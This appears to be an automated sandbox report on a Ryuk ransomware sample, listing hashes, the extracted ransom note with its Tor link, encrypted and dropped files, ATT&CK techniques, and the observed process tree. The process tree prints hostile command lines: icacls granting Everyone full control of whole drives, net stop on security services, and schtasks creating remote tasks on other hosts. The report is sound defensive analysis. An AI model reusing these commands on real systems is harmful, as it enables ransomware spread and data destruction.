ryuk | 9eb7abf2228ad28d8b7f571e0495d4a35da40607f04355307077975e271553b8

Analysis

max time kernel
109s
max time network
150s
platform
windows10_x64
resource
win10v20201028
submitted
17-03-2021 21:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c68395e474088d5339972e2bf5a30f3c.bin.exe
Size

119KB
MD5

c68395e474088d5339972e2bf5a30f3c
SHA1

502e42240969399c09337ecc7b5ca8fc1ba4baf3
SHA256

9eb7abf2228ad28d8b7f571e0495d4a35da40607f04355307077975e271553b8
SHA512

5320fe8144071dde940ebd0285e6fcf573d36c28ea51fca3b5aecc49bfe5ffcf25d1afbd294e0d0b565a3a621d5ea189b075d868bbef521f2e1fe6702e8be75a

Score

10^/10

ryuk discovery ransomware

Malware Config

Extracted

Path

C:\users\Public\RyukReadMe.html

Family

ryuk

Ransom Note

contact balance of shadow universe Ryuk $password = 'BVb1qR2'; $torlink = 'http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'; function info(){alert("INSTRUCTION:\r\n1. Download tor browser.\r\n2. Open link through tor browser: " + $torlink + "\r\n3. Fill the form, your password: "+ $password +"\r\nWe will contact you shortly.\r\nAlways send files for test decryption.");};

URLs

http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Executes dropped EXE 3 IoCs

Processes:

RQzkZQvytrep.exeNRYCHQScalan.exeCWIOuEVhmlan.exe

pid process

3100 RQzkZQvytrep.exe
576 NRYCHQScalan.exe
1756 CWIOuEVhmlan.exe

pid	process
3100	RQzkZQvytrep.exe
576	NRYCHQScalan.exe
1756	CWIOuEVhmlan.exe

Drops startup file 1 IoCs

Processes:

c68395e474088d5339972e2bf5a30f3c.bin.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

3648 icacls.exe
3816 icacls.exe

pid	process
3648	icacls.exe
3816	icacls.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

c68395e474088d5339972e2bf5a30f3c.bin.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	c68395e474088d5339972e2bf5a30f3c.bin.exe

Drops file in Program Files directory 64 IoCs

Processes:

c68395e474088d5339972e2bf5a30f3c.bin.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\ij	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ExcelCombinedFloatieModel.bin	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMECONTROLPROXY.DLL	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h.png	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019DemoR_BypassTrial180-ul-oob.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\images\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033\PowerPivotExcelClientAddIn.rll	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.png	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\gui\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_ie8.gif	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ul-phn.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\PREVIEW.GIF	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\jfr.jar	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ul-oob.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ADO210.CHM	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Grace-ppd.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ppd.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\ui-strings.js	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64\RyukReadMe.html	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WEBSANDBOX.DLL	c68395e474088d5339972e2bf5a30f3c.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	c68395e474088d5339972e2bf5a30f3c.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6048 schtasks.exe
1704 schtasks.exe
Runs net.exe

pid	process
6048	schtasks.exe
1704	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

c68395e474088d5339972e2bf5a30f3c.bin.exe

pid	process
4760	c68395e474088d5339972e2bf5a30f3c.bin.exe
4760	c68395e474088d5339972e2bf5a30f3c.bin.exe
4760	c68395e474088d5339972e2bf5a30f3c.bin.exe
4760	c68395e474088d5339972e2bf5a30f3c.bin.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

c68395e474088d5339972e2bf5a30f3c.bin.exenet.exenet.exenet.exenet.exeRQzkZQvytrep.exe

description	pid	process	target process
PID 4760 wrote to memory of 3100	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	RQzkZQvytrep.exe
PID 4760 wrote to memory of 3100	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	RQzkZQvytrep.exe
PID 4760 wrote to memory of 3100	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	RQzkZQvytrep.exe
PID 4760 wrote to memory of 576	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	NRYCHQScalan.exe
PID 4760 wrote to memory of 576	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	NRYCHQScalan.exe
PID 4760 wrote to memory of 576	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	NRYCHQScalan.exe
PID 4760 wrote to memory of 1756	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	CWIOuEVhmlan.exe
PID 4760 wrote to memory of 1756	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	CWIOuEVhmlan.exe
PID 4760 wrote to memory of 1756	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	CWIOuEVhmlan.exe
PID 4760 wrote to memory of 3648	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 3648	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 3648	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 3816	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 3816	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 3816	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	icacls.exe
PID 4760 wrote to memory of 2960	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 2960	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 2960	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 2988	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 2988	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 2988	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4008	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4008	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4008	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4352	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4352	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 4760 wrote to memory of 4352	4760	c68395e474088d5339972e2bf5a30f3c.bin.exe	net.exe
PID 2960 wrote to memory of 5272	2960	net.exe	net1.exe
PID 2960 wrote to memory of 5272	2960	net.exe	net1.exe
PID 2960 wrote to memory of 5272	2960	net.exe	net1.exe
PID 2988 wrote to memory of 5384	2988	net.exe	net1.exe
PID 2988 wrote to memory of 5384	2988	net.exe	net1.exe
PID 2988 wrote to memory of 5384	2988	net.exe	net1.exe
PID 4008 wrote to memory of 5468	4008	net.exe	net1.exe
PID 4008 wrote to memory of 5468	4008	net.exe	net1.exe
PID 4008 wrote to memory of 5468	4008	net.exe	net1.exe
PID 4352 wrote to memory of 5608	4352	net.exe	net1.exe
PID 4352 wrote to memory of 5608	4352	net.exe	net1.exe
PID 4352 wrote to memory of 5608	4352	net.exe	net1.exe
PID 3100 wrote to memory of 6048	3100	RQzkZQvytrep.exe	schtasks.exe
PID 3100 wrote to memory of 6048	3100	RQzkZQvytrep.exe	schtasks.exe
PID 3100 wrote to memory of 6048	3100	RQzkZQvytrep.exe	schtasks.exe
PID 3100 wrote to memory of 1704	3100	RQzkZQvytrep.exe	schtasks.exe
PID 3100 wrote to memory of 1704	3100	RQzkZQvytrep.exe	schtasks.exe
PID 3100 wrote to memory of 1704	3100	RQzkZQvytrep.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\c68395e474088d5339972e2bf5a30f3c.bin.exe
"C:\Users\Admin\AppData\Local\Temp\c68395e474088d5339972e2bf5a30f3c.bin.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4760

C:\Users\Admin\AppData\Local\Temp\RQzkZQvytrep.exe
"C:\Users\Admin\AppData\Local\Temp\RQzkZQvytrep.exe" 9 REP
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.90 /TN 9ZZtJ32 /TR "C:\Users\Public\RQzkZQvytrep.exe" /sc once /st 00:00 /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:6048

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /S 10.10.0.64 /TN lzC1Rnc /TR "C:\Users\Public\RQzkZQvytrep.exe" /sc once /st 00:00 /RL HIGHEST
3⤵
- Creates scheduled task(s)
PID:1704

C:\Users\Admin\AppData\Local\Temp\NRYCHQScalan.exe
"C:\Users\Admin\AppData\Local\Temp\NRYCHQScalan.exe" 8 LAN
2⤵
- Executes dropped EXE
PID:576

C:\Users\Admin\AppData\Local\Temp\CWIOuEVhmlan.exe
"C:\Users\Admin\AppData\Local\Temp\CWIOuEVhmlan.exe" 8 LAN
2⤵
- Executes dropped EXE
PID:1756

C:\Windows\SysWOW64\icacls.exe
icacls "C:\*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3648

C:\Windows\SysWOW64\icacls.exe
icacls "D:\*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3816

C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "audioendpointbuilder" /y
3⤵
PID:5272

C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "audioendpointbuilder" /y
3⤵
PID:5384

C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" stop "samss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "samss" /y
3⤵
PID:5608

C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" stop "samss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "samss" /y
3⤵
PID:5468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\$Recycle.Bin\S-1-5-21-3341490333-719741536-2920803124-1000\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\BOOTSECT.BAK.RYK

MD5
3340af56f8198494a807a01054d23d85

SHA1
86ed6df32a1ec43be09ce13f11600f246f56f5cf

SHA256
8913dedc292ddabee5aa1ee9fae730a3738e6a594818bcceb2481e487c40a300

SHA512
853625cb033347a7b2f4a3f615aaa772e817e8dc3a3a286bf9376c0d76dd5c2bcb7e400ff50faa6be399c20f72af2899fb8634052d23c172f4a1e22603f53616

Download Submit
C:\Boot\BOOTSTAT.DAT.RYK

MD5
9e1b9850d985590cff222a2b5ffe47b4

SHA1
83ccedb3a64bcbff6734a3715ec5df0d4e178765

SHA256
fb13d7dc247ac9f8a789c96c8845026eb009679441f21868c31b3d49f0f8c188

SHA512
e665746bff6ab78595f063d0e368e92f1784dee40852954b7e6cf524eacc80b7ced93d8e691e4fdba3f03f997e1e75822f35deba08b77a450f539e53b26c3a00

Download Submit
C:\Boot\Fonts\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\Resources\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\Resources\en-US\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\bg-BG\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\cs-CZ\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\da-DK\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\de-DE\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\el-GR\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\en-GB\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
C:\Boot\en-US\RyukReadMe.html

MD5
98d3b55cce54a33a6648f5b02a11f65d

SHA1
8c0fd3cb0ab6b4bf962199b2187d0984490fa8ef

SHA256
807979e800f4efcf68130c5b6c5af3c333c76e8b7198419ab0a2966a84322131

SHA512
9e8d9707a15bdd0e6a7ee360359d01220c5fe95ff472bef0c7460c2749eb8a1a480392b426a62709838d1260a25cff8f5da512eedd61fe2485ca61f3df451a15

Download Submit
